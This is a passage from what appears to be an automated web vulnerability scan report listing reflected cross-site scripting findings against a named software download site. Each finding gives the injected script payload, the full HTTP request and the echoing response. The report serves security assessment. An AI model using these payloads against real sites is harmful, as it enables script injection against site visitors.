<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1" />
...[SNIP]...

1.168. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6549"><script>alert(1)</script>b1e5c16342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html" />
...[SNIP]...

1.169. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe78"><script>alert(1)</script>a8e92c56ad6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6" />
...[SNIP]...

1.170. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b7b"><script>alert(1)</script>a8d922c9ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1" />
...[SNIP]...

1.171. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed3a"><script>alert(1)</script>e871d75a71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html" />
...[SNIP]...

1.172. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d39"><script>alert(1)</script>36b459a9d64 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64" />
...[SNIP]...

1.173. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e19f5"><script>alert(1)</script>e0881237aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1" />
...[SNIP]...

1.174. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40541"><script>alert(1)</script>0a50b7a4e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:33:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html" />
...[SNIP]...

1.175. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597b7"><script>alert(1)</script>5a1bd81061d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d" />
...[SNIP]...

1.176. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6254b"><script>alert(1)</script>08a105a460f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1" />
...[SNIP]...

1.177. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38933"><script>alert(1)</script>a091c5ce1f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html" />
...[SNIP]...

1.178. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880f5"><script>alert(1)</script>ffef72251bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb" />
...[SNIP]...

1.179. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afba"><script>alert(1)</script>952a07404a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1" />
...[SNIP]...

1.180. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab8db"><script>alert(1)</script>a8017a7f1a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html" />
...[SNIP]...

1.181. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e91c"><script>alert(1)</script>e48652f16c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2" />
...[SNIP]...

1.182. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5836"><script>alert(1)</script>5c1d810d2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1" />
...[SNIP]...

1.183. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

